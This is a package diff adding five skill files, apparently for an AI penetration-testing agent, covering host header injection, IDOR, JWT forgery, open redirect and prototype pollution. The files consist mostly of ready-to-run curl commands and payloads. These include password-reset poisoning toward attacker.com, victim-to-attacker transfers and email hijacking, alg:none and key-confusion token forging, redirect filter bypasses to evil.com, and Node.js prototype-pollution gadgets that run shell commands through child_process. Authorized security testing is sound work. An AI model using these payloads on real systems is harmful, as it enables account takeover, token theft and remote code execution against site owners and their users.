@cyberstrike-io/cyberstrike 1.1.13 → 1.1.14

package/skill/attack-host-header/SKILL.md

@@ -0,0 +1,106 @@
+---
+name: attack-host-header
+description: "Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - host-header
+  - web
+  - injection
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-644
+chains_with:
+  - attack-cache-poison
+  - attack-open-redirect
+prerequisites: []
+severity_boost:
+  attack-cache-poison: "Host header + cache poisoning = stored attack affecting all users"
+---
+
+# Host Header Injection
+
+## Objective
+
+Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.
+
+## Testing Methodology
+
+### Phase 1: Password Reset Poisoning
+
+```bash
+# Trigger password reset with injected Host
+curl -X POST https://TARGET/forgot-password \
+  -H "Host: attacker.com" \
+  -d "email=victim@example.com"
+
+# X-Forwarded-Host variant
+curl -X POST https://TARGET/forgot-password \
+  -H "X-Forwarded-Host: attacker.com" \
+  -d "email=victim@example.com"
+```
+
+If the reset email link contains `attacker.com`, the token is leaked when victim clicks.
+
+### Phase 2: Duplicate Host Headers
+
+```bash
+# Two Host headers
+curl https://TARGET/ \
+  -H "Host: TARGET" \
+  -H "Host: attacker.com"
+
+# Host with port injection
+curl https://TARGET/ \
+  -H "Host: TARGET:@attacker.com"
+```
+
+### Phase 3: X-Forwarded-Host / X-Host
+
+```bash
+curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
+curl https://TARGET/ -H "X-Host: attacker.com"
+curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
+curl https://TARGET/ -H "X-Original-URL: /admin"
+curl https://TARGET/ -H "X-Rewrite-URL: /admin"
+```
+
+### Phase 4: Absolute URL Routing
+
+```bash
+# Absolute URL overrides Host header
+curl "https://TARGET/api" \
+  -H "Host: internal-admin.TARGET"
+```
+
+### Phase 5: Web Cache Poisoning via Host
+
+```bash
+# If response is cached with injected host
+curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
+# Subsequent requests from any user will get poisoned response
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Password reset link contains injected host | Critical (P1) |
+| Cache poisoned with injected host/links | High (P2) |
+| Internal routing bypass (access /admin) | High (P2) |
+| Host header reflected in page without sanitization | Medium (P3) |
+
+## Evidence Requirements
+
+- Request with injected Host header
+- Response/email showing injected domain
+- For cache poisoning: cached response serving injected content
+- For password reset: full reset URL with attacker domain
+
+## References
+
+- [PortSwigger: Host Header Attacks](https://portswigger.net/web-security/host-header)
+- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)

package/skill/attack-idor-automation/SKILL.md

@@ -0,0 +1,150 @@
+---
+name: attack-idor-automation
+description: "IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - idor
+  - bac
+  - access-control
+  - web
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-639
+  - CWE-284
+chains_with:
+  - attack-jwt
+  - attack-graphql
+prerequisites: []
+severity_boost:
+  attack-jwt: "JWT tamper + IDOR = full account takeover"
+---
+
+# IDOR Automated Testing
+
+## Objective
+
+Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.
+
+## Testing Methodology
+
+### Phase 1: Set Up Two Accounts
+
+1. **Account A** (victim) — owns resources being tested
+2. **Account B** (attacker) — tries to access Account A's resources
+
+### Phase 2: Automated Cross-Account Testing
+
+```bash
+# Test endpoints from file
+attack_script idor_tester \
+  --token-a "VICTIM_JWT" \
+  --token-b "ATTACKER_JWT" \
+  --endpoints endpoints.txt \
+  --json-output
+
+# Test comma-separated endpoints
+attack_script idor_tester \
+  --token-a "VICTIM_JWT" \
+  --token-b "ATTACKER_JWT" \
+  --endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
+  --method GET
+
+# Test write operations
+attack_script idor_tester \
+  --token-a "VICTIM_JWT" \
+  --token-b "ATTACKER_JWT" \
+  --endpoints endpoints.txt \
+  --method PUT \
+  --data '{"name":"pwned"}'
+```
+
+### Phase 3: Manual Testing Patterns
+
+**Horizontal IDOR (same role, different user):**
+```bash
+# Sequential IDs
+curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
+curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2
+
+# UUID guessing (if predictable)
+curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER
+
+# Endpoint enumeration
+for id in $(seq 1 100); do
+  curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
+done
+```
+
+**Vertical IDOR (low-priv accessing high-priv):**
+```bash
+# User accessing admin endpoints
+curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
+curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
+curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports
+```
+
+### Phase 4: HTTP Method Switching
+
+```bash
+# GET blocked but DELETE works
+curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID
+
+# GET blocked but PATCH works
+curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
+  -d '{"email":"attacker@evil.com"}'
+```
+
+### Phase 5: Parameter Pollution
+
+```bash
+# Dual ID injection
+curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"
+
+# Body override
+curl -X POST https://TARGET/api/transfer \
+  -H "Authorization: Bearer ATTACKER_TOKEN" \
+  -d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'
+```
+
+### Phase 6: Response Comparison
+
+```bash
+# Compare responses between two auth contexts
+attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
+  --header-a "Authorization:Bearer VICTIM_TOKEN" \
+  --header-b "Authorization:Bearer ATTACKER_TOKEN" \
+  --json-output
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Read other user's PII (email, SSN, etc.) | Critical (P1) |
+| Modify other user's data | Critical (P1) |
+| Delete other user's resources | Critical (P1) |
+| Access admin functionality | Critical (P1) |
+| Read non-sensitive data of other user | Medium (P3) |
+
+## Evidence Requirements
+
+- Two different auth tokens used
+- Endpoint tested
+- Account A (victim) response as baseline
+- Account B (attacker) accessing Account A's resource
+- Data received proving cross-account access
+
+## Tools
+
+- `attack_script idor_tester` — automated cross-account testing
+- `attack_script response_diff` — response comparison
+- `attack_script jwt_tamper` — token manipulation for IDOR
+
+## References
+
+- [OWASP: IDOR](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References)
+- [PortSwigger: Access Control](https://portswigger.net/web-security/access-control/idor)

package/skill/attack-jwt/SKILL.md

@@ -0,0 +1,122 @@
+---
+name: attack-jwt
+description: "JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - jwt
+  - authentication
+  - web
+  - token
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-287
+  - CWE-347
+  - CWE-345
+chains_with:
+  - attack-idor-automation
+prerequisites: []
+severity_boost:
+  attack-idor-automation: "JWT tampering + IDOR = full account takeover"
+---
+
+# JWT Token Attack
+
+## Objective
+
+Exploit JWT implementation weaknesses to bypass authentication, escalate privileges, or forge tokens.
+
+## Testing Methodology
+
+### Phase 1: Decode & Analyze
+
+```bash
+# Automated JWT analysis and tamper token generation
+attack_script jwt_tamper EYTOKEN --json-output
+
+# Manual decode
+echo "HEADER.PAYLOAD.SIG" | cut -d. -f1 | base64 -d 2>/dev/null
+echo "HEADER.PAYLOAD.SIG" | cut -d. -f2 | base64 -d 2>/dev/null
+```
+
+Check for:
+- Algorithm (`alg` field): RS256, HS256, none
+- Claims: `role`, `is_admin`, `sub`, `exp`, `aud`, `iss`
+- Key ID (`kid`): SQL injection, path traversal potential
+
+### Phase 2: Algorithm Attacks
+
+```bash
+# Generate alg=none token
+attack_script jwt_tamper EYTOKEN --set-header alg=none
+
+# Role escalation
+attack_script jwt_tamper EYTOKEN --set role=admin --set-header alg=none
+
+# User ID swap
+attack_script jwt_tamper EYTOKEN --set sub=1 --set-header alg=none
+
+# HS256 with known/weak key
+attack_script jwt_tamper EYTOKEN --set role=admin --key "secret"
+```
+
+### Phase 3: Key Confusion (RS256 → HS256)
+
+If server uses RS256, try signing with the public key as HS256 secret:
+
+```bash
+# Fetch public key
+curl -s https://TARGET/.well-known/jwks.json
+
+# Convert JWK to PEM and sign
+attack_script jwt_tamper EYTOKEN --set role=admin --key "$(cat public.pem)" --set-header alg=HS256
+```
+
+### Phase 4: kid Injection
+
+```bash
+# SQL injection via kid
+attack_script jwt_tamper EYTOKEN --set-header "kid=../../../../../../dev/null" --key ""
+
+# kid pointing to accessible file
+attack_script jwt_tamper EYTOKEN --set-header "kid=/proc/sys/kernel/hostname"
+```
+
+### Phase 5: Verify Impact
+
+```bash
+# Test tampered token
+curl -s -H "Authorization: Bearer TAMPERED_TOKEN" https://TARGET/api/admin/users
+```
+
+## What Constitutes a Finding
+
+| Attack | Severity |
+|--------|----------|
+| alg=none accepted — auth bypass | Critical (P1) |
+| Role escalation via claim tampering | Critical (P1) |
+| RS256→HS256 key confusion | Critical (P1) |
+| Weak signing key (crackable) | High (P2) |
+| kid SQL injection | Critical (P1) |
+| Expired tokens accepted | Medium (P3) |
+
+## Evidence Requirements
+
+- Original JWT decoded (header + payload)
+- Tampered JWT with modified claims
+- Server response accepting tampered token
+- Proof of elevated access (admin data, other user data)
+
+## Tools
+
+- `attack_script jwt_tamper` — automated decode/tamper/re-encode
+- `jwt_tool` (external) — comprehensive JWT testing
+- `hashcat -m 16500` — JWT secret cracking
+
+## References
+
+- [PortSwigger: JWT Attacks](https://portswigger.net/web-security/jwt)
+- [RFC 7519 - JSON Web Token](https://tools.ietf.org/html/rfc7519)

package/skill/attack-open-redirect/SKILL.md

@@ -0,0 +1,129 @@
+---
+name: attack-open-redirect
+description: "Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - open-redirect
+  - web
+  - phishing
+  - oauth
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-601
+chains_with:
+  - attack-cors
+  - attack-jwt
+prerequisites: []
+severity_boost:
+  attack-jwt: "Open redirect + OAuth = JWT/token theft"
+---
+
+# Open Redirect
+
+## Objective
+
+Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.
+
+## Testing Methodology
+
+### Phase 1: Identify Redirect Parameters
+
+Common parameter names:
+```
+url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
+next, goto, target, dest, destination, rurl, redir, forward, continue,
+callback, path, out, view, login_url, image_url, go, link, ref
+```
+
+### Phase 2: Basic Payloads
+
+```bash
+# Direct redirect
+curl -s -D- "https://TARGET/redirect?url=https://evil.com"
+
+# Protocol-relative
+curl -s -D- "https://TARGET/redirect?url=//evil.com"
+
+# Encoded
+curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"
+
+# Backslash bypass
+curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"
+
+# At-sign bypass
+curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"
+```
+
+### Phase 3: Filter Bypass
+
+```bash
+# Subdomain matching
+curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"
+
+# URL encoding tricks
+curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"
+
+# Double encoding
+curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"
+
+# Null byte
+curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"
+
+# CRLF + Location header
+curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"
+
+# JavaScript scheme
+curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"
+
+# Data URI
+curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"
+```
+
+### Phase 4: OAuth Token Theft
+
+```bash
+# Test with OAuth tester
+attack_script oauth_tester "https://TARGET/oauth/authorize" \
+  --client-id CLIENT_ID \
+  --redirect-uri "https://TARGET/callback" \
+  --json-output
+```
+
+If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.
+
+### Phase 5: Impact Escalation
+
+- Redirect in login flow → credential phishing
+- Redirect in OAuth flow → token theft (P1)
+- Redirect in email verification → account takeover
+- Redirect + SSRF → internal access
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Open redirect + OAuth token theft | Critical (P1) |
+| Open redirect in login/auth flow | High (P2) |
+| Generic open redirect | Medium (P3) |
+| JavaScript scheme redirect (XSS) | High (P2) |
+
+## Evidence Requirements
+
+- URL with redirect parameter and payload
+- Response showing 302/301 to attacker domain
+- For OAuth: stolen authorization code/token
+- Location header value in response
+
+## Tools
+
+- `attack_script oauth_tester` — OAuth redirect_uri bypass testing
+- `curl` — manual redirect testing
+
+## References
+
+- [PortSwigger: Open Redirect](https://portswigger.net/kb/issues/00500100_open-redirection-reflected)
+- [OWASP: Unvalidated Redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)

package/skill/attack-prototype-pollution/SKILL.md

@@ -0,0 +1,132 @@
+---
+name: attack-prototype-pollution
+description: "JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - prototype-pollution
+  - javascript
+  - web
+  - xss
+  - attack
+tech_stack:
+  - javascript
+  - nodejs
+  - web
+cwe_ids:
+  - CWE-1321
+chains_with:
+  - attack-ssti
+prerequisites: []
+severity_boost:
+  attack-ssti: "Prototype pollution → SSTI gadgets = RCE"
+---
+
+# Prototype Pollution
+
+## Objective
+
+Exploit JavaScript prototype pollution to modify Object.prototype, leading to XSS, privilege escalation, or RCE via gadget chains.
+
+## Testing Methodology
+
+### Phase 1: Client-Side Detection
+
+**URL-based pollution:**
+```
+https://TARGET/?__proto__[polluted]=1
+https://TARGET/?__proto__.polluted=1
+https://TARGET/?constructor[prototype][polluted]=1
+https://TARGET/#__proto__[polluted]=1
+```
+
+Verify in browser console:
+```javascript
+console.log(({}).polluted) // Should print "1" if vulnerable
+```
+
+### Phase 2: JSON Body Pollution
+
+```bash
+# Merge/patch endpoints
+curl -X POST https://TARGET/api/settings \
+  -H "Content-Type: application/json" \
+  -d '{"__proto__": {"isAdmin": true}}'
+
+curl -X PATCH https://TARGET/api/user/profile \
+  -d '{"constructor": {"prototype": {"role": "admin"}}}'
+
+# Nested object merge
+curl -X PUT https://TARGET/api/config \
+  -d '{"a": {"__proto__": {"polluted": true}}}'
+```
+
+### Phase 3: Server-Side Detection (Node.js)
+
+```bash
+# RCE via child_process gadget
+curl -X POST https://TARGET/api/merge \
+  -H "Content-Type: application/json" \
+  -d '{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require(\"child_process\").execSync(\"id\").toString())", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'
+
+# EJS template gadget
+curl -X POST https://TARGET/api/settings \
+  -d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"id\");s"}}'
+
+# Handlebars gadget
+curl -X POST https://TARGET/api/settings \
+  -d '{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "params": [], "path": {"type": "PathExpression", "original": "constructor"}}]}}'
+```
+
+### Phase 4: Client-Side Gadgets
+
+Common DOM gadgets when `Object.prototype` is polluted:
+
+```javascript
+// innerHTML gadget
+Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'
+
+// src gadget
+Object.prototype.src = 'javascript:alert(1)'
+
+// href gadget
+Object.prototype.href = 'javascript:alert(1)'
+
+// data-* attributes
+Object.prototype['data-tooltip'] = '<img src=x onerror=alert(1)>'
+```
+
+### Phase 5: Framework-Specific
+
+**Express.js / Pug:**
+```json
+{"__proto__": {"block": {"type": "Text", "val": "x]));process.exit()//"}}}
+```
+
+**Lodash merge:**
+```json
+{"__proto__": {"polluted": true}}
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Server-side RCE via prototype pollution gadget | Critical (P1) |
+| Privilege escalation (isAdmin=true) | Critical (P1) |
+| Client-side XSS via DOM gadget | High (P2) |
+| Prototype pollution without known gadget | Medium (P3) |
+
+## Evidence Requirements
+
+- Endpoint accepting merge/deep-copy of user input
+- Payload sent (__proto__ or constructor.prototype)
+- Proof of pollution (new property on empty object)
+- For RCE: command output
+- For XSS: JavaScript execution proof
+
+## References
+
+- [PortSwigger: Prototype Pollution](https://portswigger.net/web-security/prototype-pollution)
+- [Server-Side Prototype Pollution](https://portswigger.net/research/server-side-prototype-pollution)